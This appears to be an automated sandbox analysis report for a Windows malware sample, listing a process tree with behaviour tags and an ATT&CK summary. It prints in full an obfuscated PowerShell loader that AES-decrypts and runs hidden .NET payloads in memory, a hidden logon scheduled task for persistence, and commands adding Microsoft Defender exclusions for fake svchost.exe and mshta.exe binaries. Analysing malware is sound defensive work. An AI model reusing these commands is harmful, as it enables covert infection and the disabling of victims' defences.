}}$payloads_var=[string[]]$LRDpi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_962_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6bNEY3sTSdsJ4NfUEY/2/xRnHnqPxOtMFI0yhkApf/U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP6F/5ltKE9CwNnyWHWWxw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZUEUT=New-Object System.IO.MemoryStream(,$param_var); $EHmsi=New-Object System.IO.MemoryStream; $YTwNB=New-Object System.IO.Compression.GZipStream($ZUEUT, [IO.Compression.CompressionMode]::Decompress); $YTwNB.CopyTo($EHmsi); $YTwNB.Dispose(); $ZUEUT.Dispose(); $EHmsi.Dispose(); $EHmsi.ToArray();}function execute_function($param_var,$param2_var){ $SNmHa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sndxj=$SNmHa.EntryPoint; $sndxj.Invoke($null, $param2_var);}$SliZP = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat';$host.UI.RawUI.WindowTitle = $SliZP;$fGcJE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SliZP).Split([Environment]::NewLine);foreach ($kVlCf in $fGcJE) { if ($kVlCf.StartsWith('mrPiDrvnjNQnkoxilunb')) { $LRDpi=$kVlCf.Substring(20); break; }}$payloads_var=[string[]]$LRDpi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe"C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=hat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.08⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffec2046f8,0x7fffec204708,0x7fffec2047189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:39⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4564 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4564 /prefetch:89⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
Depth: 9
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
Depth: 9
-
C:\Windows\system32\msdt.exe
-modal "197078" -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\Admin\AppData\Local\Temp\NDFFDA9.tmp" -ep "NetworkDiagnosticsWeb"
Depth: 9
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
Depth: 9
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
Depth: 9
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=hat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Depth: 8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7fffec2046f8,0x7fffec204708,0x7fffec204718
Depth: 9
-
C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe"
Depth: 7
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe'
Depth: 8
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'
Depth: 8
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe"
Depth: 7
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe"
Depth: 7
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe'
Depth: 8
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Depth: 8
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
Depth: 1
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Depth: 1
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
Depth: 1
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
Depth: 1
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Depth: 1
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Depth: 1
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS
Depth: 1
- Drops file in System32 directory
- Checks processor information in registry
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost
Depth: 1
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\winethc.dll",ForceProxyDetectionOnNextRun
Depth: 2
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost
Depth: 1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultbcd1a1cfhd411h4ae1h9fe3h3354cdb4a53e
Depth: 1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffec2046f8,0x7fffec204708,0x7fffec204718
Depth: 2
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1430714184297952503,12384781248704128857,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
Depth: 2
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1430714184297952503,12384781248704128857,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
Depth: 2
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
Depth: 1
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Privilege Escalation
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Defense Evasion
- Modify Registry (3)
- Impair Defenses (1)
  - Disable or Modify System Firewall (1)
Downloads